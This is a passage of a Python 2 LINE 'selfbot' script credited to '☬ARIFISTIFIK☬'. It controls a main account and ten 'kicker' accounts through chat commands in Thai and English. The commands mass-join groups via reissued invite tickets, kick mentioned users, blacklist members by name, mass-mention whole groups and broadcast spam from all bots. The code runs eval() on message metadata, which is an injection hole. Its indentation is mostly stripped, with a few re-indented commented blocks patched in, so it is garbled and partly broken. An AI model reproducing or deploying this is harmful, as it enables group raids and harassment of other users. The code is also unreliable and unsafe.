msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "#หำ1:" in msg.text:
string = msg.text.replace("#หำ1:","")
if len(string.decode('utf-8')) <= 20:
profile = ki1.getProfile()
profile.displayName = string
ki1.updateProfile(profile)
elif msg.text in ["join","มาหำ","#Kicker","#kicker","Kicker","kicker","•••"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.sendText(msg.to,"[SELF BOT\ทBy:☬ARIFISTIFIK☬ ]")
ki2.sendText(msg.to,"[Do not think will try.]")
ki3.sendText(msg.to,"[ By: ☬ARIFISTIFIK☬ ]")
ki1.sendText(msg.to,"Hello " + str(ginfo.name) + "\n[By:☬ARIFISTIFIK☬ ]")
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["kick"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["out","mybotออก","Bye","#bye"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki1.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki1.leaveGroup(msg.to)
ki2.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki2.leaveGroup(msg.to)
ki3.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki3.leaveGroup(msg.to)
ki4.sendText(msg.to,"Bye~Bye\nลาก่อย" + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki4.leaveGroup(msg.to)
ki5.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki5.leaveGroup(msg.to)
ki6.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]]")
ki6.leaveGroup(msg.to)
ki7.sendText(msg.to,"Bye~Bye\nลาก่อย ??" + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki7.leaveGroup(msg.to)
ki8.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki8.leaveGroup(msg.to)
ki9.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki9.leaveGroup(msg.to)
ki10.sendText(msg.to,"Bye~Bye\ลาก่อย " + str(ginfo.name) + "\n[By ☬ARIFISTIFIK☬]")
ki10.leaveGroup(msg.to)
except:
pass
elif msg.text.lower() == '#byeall':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
except:
pass
elif "#v10" in msg.text:
cl.sendText(msg.to,"""[SELF BOT]\n[By:☬ARIFISTIFIK☬]")
คำสั่งmybot siri
คำนี้เป็นการล็อกห้องสั่งแล้วทุกคนจะทำอะไรไม่ได้นอกจากเจ้าของห้องทำได้คนเดียวเช่น•เปิดลิงค์•เชิญเพื่อน•เปลี่ยนรูปกลุ่ม•เปลี่ยนชื่อกลุ่มไรแบบนี้• mybotจะไม่เตะเเอทมินทุกกรณี
มีตั้งเเต่ชุดmybot 12-37 mybot
ชุดล๊อกห้อง
ล๊อกกันรันสติ๊กเกอร์
Set:StampLimitation:on
ล๊อกชื่อกลุ่ม
Set:changenamelock:on
ล๊อกการเชิญของสมาชิก
Set:blockinvite:on
ล๊อกแอทมินกลุ่ม
Set:ownerlock:on
ล๊อกรูปกลุ่ม
Set:iconlock:on
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:changeowner
เปลี่ยนเจ้าของห้องสั่งแล้วส่งคอลแทคคนที่จะเป็นเจ้าของห้องคนต่อไปลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:addblacklist
บัญชีดำแบ็คลิสคนไม่ให้เข้ากลุ่มสั่งแล้วส่งคอลแทคคนที่เราจะแบ็คลิสลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:addwhitelist
บัญชีขาวแก้ดำสั่งแล้วส่งคอลแทคคนที่เราจะแก้แบ๊คลิสลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:blockinvite:off ปลดล็อกการเชิญ
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:blockinvite:on ล็อกการเชิญ
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:inviteurl เปิดลิงค์
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:DenyURLInvite ปิดลิงค์
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:cancelinvite ยกเลิกค้างเชิญสั่ง2ครั้ง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:groupcreator เช็คเจ้าของบ้านตัวจริง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:extracreator เช็คเจ้าของบ้านคนสำรอง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:changeextraowner
เพิ่มเจ้าของบ้านคนที2หรือเรียกคนสำรองสั่งแล้วส่งคอลแทคคนที่จะเป็นคนสำรองลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:turncreator
สลับให้เจ้าของบ้านคนที่2เป็นตัวจริง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
ดูคนอ่าน
สั่งตั้งค่าก่อนแล้วค่อยสั่งอ่านคน
Setlastpoint ตั้งค่า
Viewlastseen สั่งอ่าน
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
สนใจติดต่อที่
By: ☬ARIFISTIFIK☬
LINE ID 4545272
http://line.me/ti/p/arif.mh
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
""")
#==================================================
elif msg.text in ["Invite"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"โปรดส่ง คท ด้วย")
elif msg.text in ["เชิญ"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"โปรดส่ง คท ด้วย")
elif msg.text in ["invite on"]:
if msg.from_ in admin:
wait["winvite"] = False
cl.sendText(msg.to,"ปิดการเชิญ แล้ว.")
elif msg.text in ["Bot1 invite contact","1เชิญ"]:
if msg.from_ in admin:
wait["ainvite"] = True
ki1.sendText(msg.to,"send contact")
elif msg.text in ["Bot2 invite contact","2เชิญ"]:
if msg.from_ in admin:
wait["binvite"] = True
ki2.sendText(msg.to,"send contact")
elif ("Ktc " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
cl.inviteIntoGroup(msg.to,[target])
cl.cancelGroupInvitation(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif '123zzz' in msg.text.lower():
key = msg.text[-33:]
cl.findAndAddContactsByMid(key)
cl.inviteIntoGroup(msg.to, [key])
contact = cl.getContact(key)
elif msg.text in ["ยกเลิก"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["mybotยกเลิก"]:
if msg.toType == 2:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7]
kicker = random.choice(klist)
G = kicker.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kicker.sendText(msg.to,"No one is inviting")
else:
kicker.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
kicker.sendText(msg.to,"Can not be used outside the group")
else:
kicker.sendText(msg.to,"Not for use less than group")
elif msg.text in ["#Link on"]:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Open link"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"อนุญาติ ให้มีการเชิญ\nด้วยลิ้งแล้ว👌")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["close link"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดการเชิญ\nด้วยลิ้งแล้ว👌")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text.lower() == 'ginfo':
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[Nama]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nAnggota:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
elif msg.text in ["!Glist","Myginfo"]:
gs = cl.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["DPK🐲BOT"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
cl.sendText(msg.to,"[DPK🐲BOT\nBy:☬ARIFISTIFIK☬]")
elif "Key" == msg.text:
key = msg.to
cl.sendText(msg.to, key)
elif ("Hack " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif "Mid:" in msg.text:
mmid = msg.text.replace("Mid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
# elif "Phet Keyy" in msg.text:
# cl.sendText(msg.to,""" [{PHET HACK BOT}] \n\n key Only Kicker #\n\n[Kb1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Pb1 Gift]\n[Pb1 bye]\n\n
#❦❧〖฿❂Ŧ〗☞ᵀËÄM ທஇລ❂ق B❂T✓
#❦❧ ᵀËÄM ℓℓπ้ी૪ B❂T ✓
#❦❧ ᵀËÄM ທஇລ❂قB❂T ✓
#☠Ҝŋ β☢ȶȶ ƿℓαÿєᴿ☠
#✍ Ŧ€₳M ж Ħ₳ʗҜ฿❂Ŧ ✈
#Ŧ€₳M ✍ ທஇລ❂قীள้௭ิњ ✈
#☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢
#・⋆ ざঝণのঝ ⋆ ・
#♤ のю४ণধபӘທ ♤
#🇹?? ฿ΘŧŧĽÎη℮Ŧђάίłάήđ 🇹🇭
#[By.🐯 हईທຮຮๅજईह 🐯]
#[By.β•`BF.บั้ม•`]
#[By.Gυ Tєʌм HʌcκBoт]
#[By.❦〖Ᵽɧëȶ〗☞ᵀËÄM ທஇລ❂ق B❂T✓]
#""")
elif msg.text.lower() == 'ยกเลิก1':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
elif msg.text.lower() == 'mybotยกเลิก1':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki1.cancelGroupInvitation(msg.to,[_mid])
ki1.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
cl.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
elif "ct @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("ct @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "#cb" in msg.text:
nk0 = msg.text.replace("#cb","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"😏")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"😏")
except:
cl.sendText(msg.to,"😏")
elif "แบนหมด" in msg.text:
nk0 = msg.text.replace("แบนหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "ลบแบน ทั้งหมด" in msg.text:
nk0 = msg.text.replace("ลบแบน ทั้งหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
# "Mid": reply with this bot account's own mid.
elif "Mid" == msg.text:
    cl.sendText(msg.to,mid)
# "Group": reply with a summary of the current group (name, id, creator,
# picture URL, member/pending-invite counts, link open/closed state).
elif msg.text == "Group":
    if msg.toType == 2:  # group chats only
        ginfo = cl.getGroup(msg.to)
        try:
            gCreator = ginfo.creator.displayName
        except:
            # creator can be absent (e.g. left LINE); fall back to a label
            gCreator = "GROUPCREATOR"
        if wait["lang"] == "JP":
            if ginfo.invitee is None:
                sinvitee = "0"
            else:
                sinvitee = str(len(ginfo.invitee))
            # u = invite-link state label (Thai: ปิด=closed, เปิด=open)
            if ginfo.preventJoinByTicket == True:
                u = "[ปิด]"
            else:
                u = "[เปิด]"
            cl.sendText(msg.to,"[ชื่อของกลุ่ม]:\n" + str(ginfo.name) + "\n[Gid]:\n" + msg.to + "\n[Group creator:]\n" + gCreator + "\n[ลิ้งค์รูปกลุ่ม]:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n[จำนวนสมาชิก]:" + str(len(ginfo.members)) + "คน\n[จำนวนค้างเชิญ]:" + sinvitee + "คน\n[สถานะลิ้งค์]:" + u + "URL\n[By: ☬ARIFISTIFIK☬]")
        else:
            cl.sendText(msg.to,"Nama Gourp:\n" + str(ginfo.name) + "\nGid:\n" + msg.to + "\nCreator:\n" + gCreator + "\nProfile:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
    else:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Can not be used outside the group")
        else:
            cl.sendText(msg.to,"Not for use less than group")
elif "Bot1@@" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki1.sendMessage(msg)
elif msg.text in ["Bot?","absen"]:
ki1.sendText(msg.to,"😈kickเกอร๋.1 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki2.sendText(msg.to,"😈kickเกอร์.2 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki3.sendText(msg.to,"😈kickเกอร์.3 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki4.sendText(msg.to,"😈kickเกอร์.4 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki5.sendText(msg.to,"😈kickเกอร์.5 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki6.sendText(msg.to,"😈kickเกอร์.6 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki7.sendText(msg.to,"😈kickเกอร์.7 รายงานต้ว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki8.sendText(msg.to,"😈kickเกอร์.8 รายงานตีว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki9.sendText(msg.to,"😈kickเกอร์.9 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki10.sendText(msg.to,"😈kickเกอร์.10 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
elif "/say " in msg.text:
bctxt = msg.text.replace("/say ","")
ki1.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
ki7.sendText(msg.to,(bctxt))
ki8.sendText(msg.to,(bctxt))
ki9.sendText(msg.to,(bctxt))
ki10.sendText(msg.to,(bctxt))
elif "All mid" == msg.text:
ki1.sendText(msg.to,Amid1)
ki2.sendText(msg.to,Amid2)
ki3.sendText(msg.to,Amid3)
ki4.sendText(msg.to,Amid4)
ki5.sendText(msg.to,Amid5)
ki6.sendText(msg.to,Amid6)
ki7.sendText(msg.to,Amid7)
ki8.sendText(msg.to,Amid8)
ki9.sendText(msg.to,Amid9)
ki10.sendText(msg.to,Amid10)
# Enable kick/invite protection; replies with a timestamped status.
# NOTE(review): when the flag is newly set, the non-JP reply says
# "Already on" — looks swapped, but the same JP/other pattern is used by
# every toggle branch in this file, so it is preserved here.
elif msg.text in ["Protect:on","Protect on","เปิดป้องกัน"]:
    if wait["protectionOn"] == True:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
        else:
            cl.sendText(msg.to,"Protection On\n\n"+ datetime.today().strftime('%H:%M:%S'))
    else:
        wait["protectionOn"] = True
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Protection On\n\n"+ datetime.today().strftime('%H:%M:%S'))
        else:
            cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Qr:off","Qr off"]:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Qr:on","Qr on"]:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:off","Protect off","ปิดป้องกัน"]:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "เปิด ล็อคชื่อ" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ล็อคชื่อ สำเร็จ.👌..")
else:
cl.sendText(msg.to,"bone..")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "ปิด ล็อคชื่อ" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ปิด ล็อคชื่อแล้ว.👌.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"bone..")
elif "cancal on" == msg.text:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ปิดการเชิญเข้ากลุ่ม\nของสมาชิกแล้ว.👌.")
elif "cancal off" == msg.text:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"เปิด ให้สมาชิกทุกคน\nสามรถเชิญเพื่อนได้.👌.")
except:
pass
elif "Cn: " in msg.text:
string = msg.text.replace("Cn: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Name " + string + " Done Bosqu")
elif msg.text in ["invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif "Mc " in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Mc: " in msg.text:
mmid = msg.text.replace("Mc: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
ki1.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
ki6.sendMessage(msg)
ki7.sendMessage(msg)
ki8.sendMessage(msg)
ki9.sendMessage(msg)
ki10.sendMessage(msg)
elif msg.text in ["K on","clubContact on","K:on"]:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["contact v"]:
if msg.from_ in admin:
wait["winvite"] = True
random.choice(KAC).sendText(msg.to,"send contact")
elif msg.text in ["K:off","ปิด คท","Contact off","K off"]:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["Auto join on","Join on","Join:on","open group","Poin on"]:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["Join off","Auto join off","closed group","Join:off","Poin off"]:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif "Gcancel:" in msg.text:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave:on","Auto leave on","เleave on","Leave on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Leave:off","Auto leave off","leave off","Leave off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["share on","Share on","Share:on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["share off","Share off","Share:off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
